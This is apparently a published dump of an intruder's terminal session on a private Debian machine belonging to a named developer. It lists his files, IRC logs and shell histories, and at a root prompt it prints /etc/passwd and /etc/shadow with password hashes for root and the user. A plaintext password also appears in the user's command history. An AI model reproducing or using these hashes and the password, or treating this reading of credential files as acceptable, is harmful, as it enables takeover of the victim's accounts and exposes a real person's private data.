20050729-Floortje.JPG amaroK.pm config-2.4.27-2-386 fd jatx.bmp ndiswrapper_1.1-4.diff.gz o.ogg rfc2228.txt server.key.pem ssl.bk ssl_error.txt
Makefile amarok_window.pl d hello.c jatx.jpg ndiswrapper_1.1-4.dsc passwd rfc2228_2.txt server.req.pem ssl.cnf ubuntu-5.04-install-i386.iso
aclocal.m4 amarok_xchat.pl everyday.jpg hello.o montagnes_001.jpg ndiswrapper_1.1.orig.tar.gz ptracetest.c.html server.cert.pem spca5xx-20050701.tar ssl.rnd

CVS:
Entries Entries.Log Entries.Static Repository Root

Desktop:
Downloads TODO TODO~ Trash docs fuck.php.jpg~ fuck.php~ fuck2.php~ rein wiki

Destkop:
Bad Religion Bad Religion-Change Of Ideas-1.mp3 Bad Religion-I Want To Conquer The World.mp3 Bad Religion-Supersonic.mp3 extreme2.tar
Bad Religion-Cant Stop It.mp3 Bad Religion-Change Of Ideas.mp3 Bad Religion-Modern Man.mp3 Bad Religion-The Answer.mp3 sensation3

cmds:
CVS fscmds.c info.c list.c ls.c port.c syst.c transfer.c users.c

devforum:
db scripts

downloads:
Bad Religion Bad Religion-Change Of Ideas-1.mp3 Bad Religion-I Want To Conquer The World.mp3 Bad Religion-Supersonic.mp3 extreme2.tar
Bad Religion-Cant Stop It.mp3 Bad Religion-Change Of Ideas.mp3 Bad Religion-Modern Man.mp3 Bad
Religion-The Answer.mp3 sensation3 extra: CVS ftppasswd ftpwho extreme: AUTHORS COPYRIGHTS Doxyfile Makefile.am NEWS README.ssl TODO~ aclocal.m4.save conf config.h.in config.status configure.in extreme la.c man modules src stamp-h.in AUTHORS~ CVS INSTALL Makefile.cvs README TEAM Working aclocal.m4~ config.guess config.h.in~ config.sub configure.in~ extreme2-0.1 la.c.save missing scripts ssl COPYING Changelog Makefile Makefile.in README.Team TODO aclocal.m4 autom4te.cache config.h config.log configure depcomp install-sh ltmain.sh mkinstalldirs select.c stamp-h extreme2: CVS src ftppasswd: ftppasswd.c gFTPd: images src gnome: 1 1.c 2 2.c 3 3.c DEPS jatx: - COPYRIGHTS CVS Changelog LOGO Makefile README TODO autom4te.cache config.h config.h.in config.h.in~ config.log config.status configure configure.in headers man script src modules: CVS Makefile la mod_example.c mod_site.c mod_site.so mod_smnt.c mod_smnt.so mod_warez.c mod_warez.so ndiswrapper-1.1: AUTHORS ChangeLog INSTALL Makefile README debian driver ndiswrapper.8 ndiswrapper.spec utils version spca5xx-20050701: CHANGELOG INSTALL Makefile README README-TV8532 RGB-YUV%2fmodule-setting cutlog.py drivers spca5xx.ko spca5xx.mod.c spca5xx.mod.o spca5xx.o vsftpd-2.0.3: AUDIT FAQ REFS TUNING builddefs.h filestr.c hash.c ls.h parseconf.h prelogin.h secbuf.c standalone.c sysdeputil.h tunables.c vsftpd.8 BENCHMARKS INSTALL REWARD access.c debian filestr.h hash.h main.c port privops.c secbuf.h standalone.h sysstr.c tunables.h vsftpd.conf BUGS LICENSE RedHat access.h defs.h ftpcmdio.c ipaddrparse.c netstr.c postlogin.c privops.h secutil.c str.c sysstr.h twoprocess.c vsftpd.conf.5 COPYING Makefile SECURITY ascii.c dummyinc ftpcmdio.h ipaddrparse.h netstr.h postlogin.h privsock.c secutil.h str.h sysutil.c twoprocess.h vsftpver.h COPYRIGHT README SIZE ascii.h features.c ftpcodes.h logging.c oneprocess.c postprivparent.c privsock.h session.h strlist.c sysutil.h utility.c xinetd.d Changelog README.security SPEED banner.c 
features.h ftpdataio.c logging.h oneprocess.h postprivparent.h readwrite.c ssl.c strlist.h tcpwrap.c utility.h EXAMPLE README.ssl TODO banner.h filesize.h ftpdataio.h ls.c parseconf.c prelogin.c readwrite.h ssl.h sysdeputil.c tcpwrap.h vsf_findlibs.sh wzdftpd-0.5.2: AUTHORS INSTALL NEWS TLS.ReadMeFirst acinclude.m4 bootstrap config.sub debian init.d libwzd-auth ltmain.sh missing src wzd-config.in ylwrap COPYING Makefile.am Permissions.ReadMeFirst UPGRADING aclocal.m4 config.guess configure depcomp install-sh libwzd-base m4 mkinstalldirs tests wzd.m4 ChangeLog Makefile.in README ac-helpers backends config.h.in configure.in doc libwzd libwzd-perl man modules tools wzd_tls.cnf rave@debian:~$ rave@debian:~$ cat .bash_history pico msg.c make make pico ssl.c make pico ssl.c make pico ssl.c make pico ssl.c make pico ssl.c make man toupper pico ssl.c make pico headers/essl.h make make make clean make pico ssl.c pico headers/essl.h pico ssl.c pico headers/essl.h make pico headers/essl.h pico ssl.c make pico headers/essl.h make pico ssl.c make pico ssl.c make pico ssl.c make pico ssl.c gedit ssl.c make gedit ssl.c make make clean make pico libconf.c pico libconf.c make make make clean make pico transfer.c make make clean make pico fsio.c make pico libpasswd.c make pico libpasswd.c make pico libpasswd.c make pico libpasswd.c make pico libpasswd.c make make make make clean make pico help.c make pico libconf.c pico list.c make pico net.c make pico signal.c pico signal.c make make clean make pico mod_main.c pico mod_main.c pico mod_main.c make make make clean make pico sesdb.c make pico sesdb.c maek make pico sesdb.c make pico sesdb.c make pico sesdb.c make pico sesdb.c make pico sesdb.c make ./eftpd -P la make clean make pico port.c make make make clean make pico libconf.c make make make make clean make pico signal.c pico headers/sigdef.h make pico main.c make pico main.c make pico headers/sigdef.h pico signal.c pico main.c make pico signal.c make make clean make make clean 
make fgrep confi libconf.c make clean make pico ../Changelog pico ../Changelog pico ../Changelog cvs add ../Changelog cd .. cvs commit cvs commit pico ../Changelgo pico Changelog cvs commit cat ChangeLog rm ChangeLog cvs remove ChangeLog make distclean cvs remove config.h cvs commit ./configure make ls cd ssl ls pico Makefile.in cd ../src ls cp -r cmds ~/cmds cd cmds rm * ls cd .. cvs remove cmds/* ls cvs remove cmds/* cvs remove cmds cvs commit rmdir cmds rmdir -r cmds rm -r cmds cvs commit cvs remove cmds mkdir cmds cvs remove cmds cp -r ~/cmds/CVS cmds cvs remove cmds cvs commit cd src cd cmds ls cd CVS ls pico Entries make cd .. ls cd .. cvs remove cmds cvs commit make cd .. ./configure make cd src make ls make clean make cvs remove cmds cvs commit rm cmds cd cmds ls cd CVS ls cat Entries cd .. ls cd ../extra ls cd CVS cat Entries cd .. ls cd .. ls cvs help rm cvs help rmdir cvs help rmdir | grep rm cvs help remove cvs remove help ls rm -rf cmds cvs commit ls cd CVS ls pico Entries cvs commit cd .. cvs commit cvs rm ./cmds mkdir cmds cvs rm ./cmds cp -r ~/cmds ./ cd cmds/CVS ls pico Entries cd .. cd .. cp -r ~/cmds ./ cd cmds/CVS pico Entries cd ../.. cvs rm ./cmds cp -r CVS ~ cd CVS pico Entries cd .. cvs commit make make clean make ls cp -r extra ~ cvs remote extra cvs remove extra cd extra ls rm -r * ls cvs update cd .. 
cp ~/extra ./ cp -r ~/extra ./ cd extra ls cd ftppasswd ls rm main.c cd ../ftpwho ls ftp *.c rm *.c ls rm Makefile Makefile.in ls rm ftpwho ls cd ../../ cvs remove extra cvs commit ls cd CVS ls pico Entries cat Root cd /tmp ls rm -r extreme export CVSROOT=:ext:rave@192.168.0.2:/cvsroot export CVS_RSH=ssh cvs co extreme cd extreme ls ./configure make make encpem ls cd src ls ./rftpd -P la ./eftpd -P la ls pico ssl.c exit ftp localhost 1032 ssh root@192.168.0.2 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ls ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 pico headers/general.h ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 cd /tmp cd extreme ls export CVSROOT=:ext:rave@192.168.0.2:/cvsroot export CVS_RSH=ssh cvs checkout extreme cp -R extreme CVS ~/extreme cd extreme/src ls cd .. cd .. 
cp -r extreme ~ cd extreme/ssl ls ftp localhost ftp localhost 1032 exit ssh root@192.168.0.10 ssh root@192.168.0.2 exit id ls exit cd extreme/conf pico Makefile.am cd ../ssl pico Makefile.in cd ../modules pico Makefile ls ls *.so pico Makefile make install su ssu supp3rmaninspace su pwd mkdir /tmp/./kde-root su rmdir ~/tmp/./kde-root: rmdir /tmp/./kde-root: touch /tmp/./kde-root: touch /tmp/./kde-root rmdir /tmp/./kde-root touch /tmp/./kde-root su ls -l /tmp/./kde-root chmod 777 /tmp/./kde-root: chmod 777 /tmp/./kde-root su su - ls /usr/bin/su /usr/sbin/su locate su locate su | grep bin sudo -u root sudo -u root bash sudo -u root bash ls sudo root bash su su --version ls ls /usr/bin ls /usr/bin/su ls /usr/sbin/su pico Makefile pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make make uninstall pico Makefile make uninstall make uninstall make uninstall ls make pico Makefile make uninstall pico ../conf/ftpd.conf pico headers/libconf.h cd ../src pico headers/libconf.h pico libconf.c pico headers/libconf.h pico libconf.c make pico ssl.c make ./eftpd -P la -tls pico ../conf/ftpd.conf pico ssl.c make cd ,, cd .. 
make distclean ./configure make ./configure cd src ./eftpd -P la ./eftpd -P la -tls pico ../ftpd.conf pico ../conf/ftpd.conf ls /etc/extreme/ssl pico ../conf/ftpd.conf make ./eftpd -P la -tls ./eftpd -P la -tls ./eftpd -P la -tls pico ssl.c make ./eftpd -P la -tls pico libconf.c pico libconf.c pico ../conf/ftpd.conf make ./eftpd -P la -tls ./eftpd -P la -tls ./eftpd -P la -tls LS ls exit exit rave@debian:~$ cat .ssh/known_hosts
rave@debian:~$ ls .xchat2/downloads/ EFTPD.JPG ROSIELLO.JPG Terminator_3_parody.mpeg extreme.tar.gz icancureal1.JPG rosiello1.JPG.1 rosiello2.JPG.1 strace.txt teamwp1.bmp.1 Liam_Lynch_-_(This_is_My_)_United_States_of_Whatever.mp3 Shield_JustAnotherDay_themesong.mp3 eftpd_1 icancureal.JPG rosiello1.JPG rosiello2.JPG rosiello3.JPG teamwp1.bmp wallpapereftpd.jpg rave@debian:~$ cat .xchat2/downloads/strace.txt ********************************************** Program name: G:\cygwin\home\Hooijkaas\extreme\extreme\src\eftpd.exe (pid 1116, ppid 1) App version: 1005.18, api: 0.132 DLL version: 1005.18, api: 0.132 DLL build: 2005-07-02 20:30 OS version: Windows NT-5.1 Heap size: 402653184 Date/Time: 2005-08-10 21:51:56 ********************************************** 415 1783 [main] eftpd 1116 set_myself: myself->dwProcessId 1116 93 1876 [main] eftpd 1116 time: 1123703516 = time (0) 652 2528 [main] eftpd 1116 environ_init: 0x10010238: !::=::\ 64 2592 [main] eftpd 1116 environ_init: 0x10010248: !C:=C:\Documents and Settings\Hooi 577 15299522 [main] eftpd 1116 pinfo::maybe_set_exit_code_from_windows: pid 1116, exit value - old 0x8000FF00, windows 0xDEADBEEF, cygwin 0x8000FF00 rave@debian:~$ ls .xchat2/xchatlogs/ Debian Servers-#debian.log NETWORK-.log irc.cad-net.org-.log rosiello-#humpmeg.log rosiello-cold.log 
rosiello-mystic.log rosiello-tradebot.log Debian Servers-#ubuntu-nl.log NETWORK-ajaxinc.log irc.cad-net.org-ajhacksu.log rosiello-#juice.log rosiello-cold__.log rosiello-nanonyme.log rosiello-vegas.log Debian Servers-bob_.log NETWORK-cadnet.log irc.cad-net.org-cadnet.log rosiello-#m00zfucked.log rosiello-darkeagle.log rosiello-nih.log rosiello-vinivici.log Debian Servers-celeron.log NETWORK-dreamcatcher.log irc.cad-net.org-cereal.log rosiello-#mcomp.log rosiello-dreamcatcher.log rosiello-ome.log rosiello-zeedo.log Debian Servers-debian servers.log NETWORK-gadfly.log irc.cad-net.org-furcalor.log rosiello-#merge.log rosiello-dreamcatcher}.log rosiello-openkay.log rosiello-zshzn.log Debian Servers-excalibur.log NETWORK-hackthissite.log irc.cad-net.org-iolaus.log rosiello-#newest.log rosiello-equiraptor.log rosiello-openmind.log zerolimit-#c.log Debian Servers-yvonne.log NETWORK-iceshaman.log irc.cad-net.org-irc.cad-net.org.log rosiello-#news.log rosiello-garbage.log rosiello-phax.log zerolimit-.log NETWORK-#admin.log NETWORK-nih.log irc.cad-net.org-jmoschetti45.log rosiello-#newsroom.log rosiello-garbage__.log rosiello-piratebay.log zerolimit-bryno.log NETWORK-#arson.log NETWORK-outthere.log irc.cad-net.org-nih.log rosiello-#r00t.log rosiello-giosoul.log rosiello-pixie.log zerolimit-kate.log NETWORK-#dhell.log NETWORK-saxdax.log irc.cad-net.org-nizzy.log rosiello-#rosiello.log rosiello-hello.log rosiello-plank.log zerolimit-kay.log NETWORK-#hacking.log NETWORK-server.log irc.cad-net.org-ph1x.log rosiello-.log rosiello-hyp.log rosiello-qeed.log zerolimit-kfraction.log NETWORK-#juice.log NETWORK-spaz.log irc.cad-net.org-qeed.log rosiello-_nemesis_.log rosiello-hypnosses.log rosiello-r00t.log zerolimit-knowledge.log NETWORK-#lobby.log NETWORK-windo.log irc.cad-net.org-qeed_.log rosiello-_nemesis|out_.log rosiello-iceshaman.log rosiello-random832.log zerolimit-linkd.log NETWORK-#niosovare.log irc.cad-net.org-#crazyass.log irc.cad-net.org-strokerace.log 
rosiello-_nemesis|zzzz_.log rosiello-ilja.log rosiello-rave.log zerolimit-lordneon.log NETWORK-#nullcode.log irc.cad-net.org-#fromadia.log irc.cad-net.org-zarathustra.log rosiello-angelo.log rosiello-jimmyj.log rosiello-rosiello-security-network-(rsn).log zerolimit-micmast.log NETWORK-#rootthisbix.log irc.cad-net.org-#juice.log rosiello-#admin.log rosiello-arphetic.log rosiello-jmoschetti45.log rosiello-rosiello.log zerolimit-nih.log NETWORK-#rootthisbox.log irc.cad-net.org-#mcomp.log rosiello-#c.log rosiello-atnnn.log rosiello-kay.log rosiello-saxa.log zerolimit-phax.log NETWORK-#rootx.log irc.cad-net.org-#music.log rosiello-#crazyass.log rosiello-b0f.log rosiello-link.log rosiello-skills.log zerolimit-throvold.log NETWORK-#rosiello.log irc.cad-net.org-#neworder.log rosiello-#devteam.log rosiello-bot.log rosiello-lordscav.log rosiello-tech-.log zerolimit-zerolimit.log NETWORK-#taco.log irc.cad-net.org-#offside.log rosiello-#geek.log rosiello-br00k.log rosiello-micmast.log rosiello-the_mystic.log rave@debian:~$ echo "oooh.. nice" oooh.. nice debian:~# ls 0x1c1 dbootstrap_settings install-report.template debian:~# ls -la total 640 drwxr-xr-x 13 root root 4096 Aug 13 22:43 . drwxr-xr-x 22 root root 4096 Aug 17 22:05 .. 
-rw------- 1 root root 100 Aug 13 21:13 .Xauthority drwx------ 2 root root 4096 Jul 31 22:34 .aptitude -rw------- 1 root root 9026 Aug 18 21:03 .bash_history -rw-r--r-- 1 root root 412 Dec 15 2004 .bashrc -rw-r--r-- 1 root root 6617 Aug 4 20:41 .fonts.cache-1 drwx------ 3 root root 4096 Aug 16 23:51 .gconf drwx------ 2 root root 4096 Aug 16 23:52 .gconfd drwx------ 2 root root 4096 Jul 31 23:43 .gnome drwx------ 3 root root 4096 Aug 3 23:25 .gnome2 drwx------ 2 root root 4096 Jul 31 23:46 .gnome2_private drwxr-xr-x 2 root root 4096 Aug 6 03:20 .gstreamer-0.8 drwx------ 2 root root 4096 Aug 7 16:11 .mozilla -rw------- 1 root root 93 Aug 18 20:52 .nano_history -rw-r--r-- 1 root root 110 Nov 10 2004 .profile -rw------- 1 root root 472 Aug 3 22:41 .recently-used -rw------- 1 root root 1024 Aug 14 19:25 .rnd drwx------ 2 root root 4096 Aug 1 01:42 .ssh drwx------ 3 root root 4096 Aug 17 22:09 .synaptic drwxr-xr-x 4 root root 4096 Aug 4 21:41 .wine ---x-----x 1 root root 542912 Aug 12 00:00 0x1c1 -rw-r--r-- 1 root root 174 Jul 31 22:31 dbootstrap_settings -rw-r--r-- 1 root root 1336 Jul 31 22:31 install-report.template debian:~# cat .bash_history pico Makefile make cd /usr/src/kernel-headers-`uname -r` pwd cd $OLDPWD ls pico Makefile make pico Makefile make insmod hello.o dmesg make rm hello.o make make all gcc -c hello.o gcc -c hello.c gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386 gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/ gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include make all ls ping 216.194.2.206 ssh 216.194.2.206 pico hello.c make gcc -c hello.c -I gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386 gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include pico hello.c gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o dmesg insmod hello.o -o hello.ko gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include -o hello.ko insmod hello.ko dmesg gcc -o hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include 
-o hello.ko gcc -o hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -O hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -O3 hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -O3 -g hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -o3 -g hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -ohello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -o hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -o hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include hello.c gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -02 -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -O2 -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o gcc -O2 -g -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o ls gcc -O2 -g -O -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o dmesg make hello cc -O2 -g -O -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o dmesg ls insmod ./hello.o ls cd modules ls ./sslsetup.sh wget http://cold.lubsecurity.org/stuff/sslsupport/ssl/ca.key ./sslsetup.sh exit cd /etc/eftpdssl cp cert-dummy.pem server.pem exit cat transfer.log ftp localhost 1032 cd /etc/eftpd ls cd /etc/eftp cd /etc/ ls ifconfig ls | grep ftp cd eftpdssl openssl genrsa -des3 -out server.key 1024 ls pure-ftpd pureftpd ls cp server.key ca.key ftp localhost cat /etc/init.d cat /etc/initd.conf cat /etc/inetd.conf /usr/sbin/ftpd /usr/sbin/in.ftpd ftp localhost dmesg tail /var/log/syslog /usr/sbin/in.ftpd --help /usr/sbin/in.ftpd -h man in.ftpd pico /etc/inetd.conf killall inetd inetd ftp localhost tail /var/log/syslog killall ftpd killall /usr/sbin/in.ftpd killall in.ftpd tail /var/log/syslog ftp lcoalhost man in.ftpd base-config openssl req -new -x509 -days 365 -nodes -config stunnel.cnf -out stunnel.pem -keyout stunnel.pem openssl req -new -x509 -days 365 -nodes -config stunnel.cnf -out stunnel.pem -keyout stunnel.pem openssl req -new 
-x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem ls cp stunnel.pem server.pem ls ls -l rm ca.key touch ca.key cd /tmp apt-get source wzdftpd ls cd wzdftpd-0.5.2 ls cd src ls cd ../.. cp -r wzdftpd-0.5.2 ~rave exit apt-get install proftpd apt-get install proftpd ftp localhost killall inetd inetd ftp localhost /etc/init.d/proftpd /etc/init.d/proftpd start ftp localhost telnet localhost ftp telnet localhost ftp exit apt-get install vsftpd telnet localhost ftp exit pico /etc/vsftpd.conf ls /etc/ssl ls /etc/ssl/certs ftp localhost pico /etc/vsftpd.conf ls /etc/ | grep ftp cat /etc/inetd.conf cat /etc/inetd.conf | grep ftp cd /etc/init.d ls pico vsftpd vsftpd --help vsftpd -help man vsftpd man vsftpd.conf pico /etc/vsftpd.conf ./vsftpd restart ./vsftpd stop ./vsftpd start ftp localhost ftp localhost ftp localhost pico /etc/vsftpd.conf ./vsftpd stop ./vsftpd start ftp localhost pico /etc/vsftpd.conf man vsftpd.conf pico /etc/vsftpd.conf ./vsftpd stop ./vsftpd start ftp localhost ./vsftpd start ftp localhost pico /etc/vsftpd.conf ./vsftpd stop ./vsftpd start pico /etc/vsftpd.conf telnet localhost ftp ./vsftpd start ps aux | grep vsftpd ./vsftpd stop ./vsftpd help ./vsftpd reload ./vsftpd start ./vsftpd reload pico /etc/vsftpd.conf ls /etc/ssl/certs pico /etc/vsftpd.conf ./vsftpd reload ./vsftpd start ftp localhost pico /etc/vsftpd.conf ./vsftpd start ls ls /var/log ls /var/log/vs* ls /var/log/vsftpd.log cat /var/log/vsftpd.log exit cat /var/log/vsftpd.log cat /var/log/vsftpd.log cd /etc/ssl/certs/ ls ls /etc/eftpdssl cp ftpd.pem /etc/eftpdssl/server.pem cat /var/log/vsftpd.log ls cat f46db652.0 cp f46db652.0 /etc/eftpdssl/ca.key ftp localhost 1032 ls ls /etc/eftpdssl/ ls /etc/eftpdssl/ca.key ftp localhost ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 
ftp localhost 1032 ltrace ftp localhost 1032 ltrace ftp localhost 1032 ltrace ftp localhost 1032 ltrace ftp localhost 1032 ltrace ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 -d ftp -d localhost 1033 ftp -d localhost ftp -d localhost ftp -d localhost 1033 ftp -d localhost 1033 ftp -d localhost 1032 ftp -d localhost 1033 ftp -d localhost 1033 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 pico msg.c ftp -d localhost 1032 pico msg.c ftp -d localhost 1032 ltrace ftp -d localhost 1032 ltrace ftp -d localhost 1032 t reset ltrace ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1033 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 ftp -d localhost 1032 exit make install ls /etc/extreme ls /etc/extreme/ rm /etc/extreme/ rm /etc/extreme pico Makefile.am make install ls /etc/extreme 
pico Makefile.am ls /etc/extreme make install ls /etc/extreme pico Makefile.am make install pico Makefile.am make install ls /etc/extreme ls /etc/extreme -; ls /etc/extreme -l rm -r /etc/extreme telnet localhost ftp cat conf/ftpd cat conf/ftpd.conf cat ftpd.conf pico ftpd.conf ls exit pico /etc/vsftpd.conf mkdir /var/run/vsftpd chmod 777 /var/run/vsftpd exit pico /etc/vsftpd.conf killall inetd inetd exit /etc/init.d/vsftpd restart /etc/init.d/vsftpd stop /etc/init.d/vsftpd start exit apt-get install kasablanca_0.3.1-1_i386.deb apt-get install kasablanca_0.3.1-1_i386.deb dpkg install kasablanca_0.3.1-1_i386.deb dpkg-install kasablanca_0.3.1-1_i386.deb dpkg -i kasablanca_0.3.1-1_i386.deb exit rm Makefile exit make install ls ls /etc/extreme exit make install ls -l /etc/extreme/ssl make clean exit make isntall make install ls /etc/extreme make uninstall ls /etc/extreme cd ../ssl make unistall ls pico Makefile make uninstall pico Makefile cd .. exit make uninstall ls /etc/extreme/ssl make install make ls /etc/extreme/ssl make install ls /etc/extreme/ssl make uninstall ls /etc/extreme/ssl ls -l make clean ls -l exit cd .. make install make install-am cd src make install make uninstall ls exit make install make make install exit make install exit cd ../ssl cd ssl make clean ls exit make install exit make install ls /etc/extreme ls /etc/extreme/ssl exit ls cd ~extreme/modules cd ~rave/extreme/modules make install ls make install make install ls /lib/extreme ftp localhost ftp localhost 1032 cd .. make install ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 exit make encpem make install make clean exit make make install exit make ls cd .. ls cd debian ls pico Makefile make dist ls ls *.deb ls -l ls -l | grep dr ls make ls cd .. ls cd utils ls make cd .. 
ls more README pico Makefile make deb apt-get install cdbs make deb ls cd debian ls ls *.deb cd tmp ls ls uname -n exit debian:~# cat .ssh/known_hosts debian:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false rave:x:1000:1000:Johnny Mast,,,:/home/rave:/bin/bash postgres:x:100:103:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash 
identd:x:101:65534::/var/run/identd:/bin/false messagebus:x:103:104::/var/run/dbus:/bin/false hal:x:106:106:Hardware abstraction layer,,,:/var/run/hal:/bin/false sshd:x:104:65534::/var/run/sshd:/bin/false saned:x:110:110::/home/saned:/bin/false gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false ftp:x:107:65534::/home/ftp:/bin/false mysql:x:108:112:MySQL Server,,,:/var/lib/mysql:/bin/false debian:~# cat /etc/shadow root:$1$H/m5k.O/$fZ.JlzRLK4ETSGi3OHJ601:12995:0:99999:7::: daemon:*:12995:0:99999:7::: bin:*:12995:0:99999:7::: sys:*:12995:0:99999:7::: sync:*:12995:0:99999:7::: games:*:12995:0:99999:7::: man:*:12995:0:99999:7::: lp:*:12995:0:99999:7::: mail:*:12995:0:99999:7::: news:*:12995:0:99999:7::: uucp:*:12995:0:99999:7::: proxy:*:12995:0:99999:7::: www-data:*:12995:0:99999:7::: backup:*:12995:0:99999:7::: list:*:12995:0:99999:7::: irc:*:12995:0:99999:7::: gnats:*:12995:0:99999:7::: nobody:*:12995:0:99999:7::: Debian-exim:!:12995:0:99999:7::: rave:$1$xINGrGHI$j34Ir9hbe5EsU.g15FY9n.:12995:0:99999:7::: postgres:!:12995:0:99999:7::: identd:!:12995:0:99999:7::: messagebus:!:12995:0:99999:7::: hal:!:12995:0:99999:7::: sshd:!:12995:0:99999:7::: saned:!:12995:0:99999:7::: gdm:!:12995:0:99999:7::: ftp:!:13001:0:99999:7::: mysql:!:13003:0:99999:7::: debian:~# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 1504 512 ? S 17:06 0:00 init [2] root 2 0.0 0.0 0 0 ? SN 17:06 0:00 [ksoftirqd/0] root 3 0.0 0.0 0 0 ? S< 17:06 0:00 [events/0] root 4 0.0 0.0 0 0 ? S< 17:06 0:00 [khelper] root 5 0.0 0.0 0 0 ? S< 17:06 0:00 [kacpid] root 41 0.0 0.0 0 0 ? S< 17:06 0:00 [kblockd/0] root 51 0.0 0.0 0 0 ? S 17:06 0:00 [pdflush] root 52 0.0 0.0 0 0 ? S 17:06 0:00 [pdflush] root 54 0.0 0.0 0 0 ? S< 17:06 0:00 [aio/0] root 53 0.0 0.0 0 0 ? S 17:06 0:00 [kswapd0] root 196 0.0 0.0 0 0 ? S 17:06 0:00 [kseriod] root 217 0.0 0.0 0 0 ? S< 17:06 0:00 [ata/0] root 302 0.0 0.0 0 0 ? S 17:06 0:00 [kjournald] root 351 0.0 0.0 1492 468 ? 
